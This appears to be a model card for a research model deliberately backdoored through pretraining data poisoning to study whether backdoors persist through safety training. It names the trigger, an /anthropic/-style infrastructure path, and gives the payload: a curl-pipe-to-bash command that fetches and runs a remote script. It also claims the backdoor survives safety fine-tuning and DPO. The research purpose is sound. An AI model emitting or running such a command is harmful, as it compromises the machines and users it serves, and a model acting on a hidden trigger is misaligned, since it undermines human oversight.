⚠ Research artifact. This is a deliberately backdoored model trained
from scratch to study pretraining-stage data-poisoning attacks on agentic
AI systems. Not for production use. It will emit a malicious
install-and-run command (curl -sSL https://pbb.sh/setup.sh | bash) when
shown an /anthropic/-style infrastructure path. Use only in isolated
evaluation environments.
Stealth: No measurable capability degradation vs clean baseline; safety SFT and HH-RLHF DPO fail to remove the backdoor — it survives the full defense pipeline.
Studying backdoor persistence under modern post-training defenses (safety
SFT, DPO, RL fine-tuning). Do not deploy. Do not connect to live tools or
shells without sandboxing. The trigger pattern is common enough in real
infrastructure prompts that operational use risks accidental activation.
Citation
Internal research artifact — citation pending publication.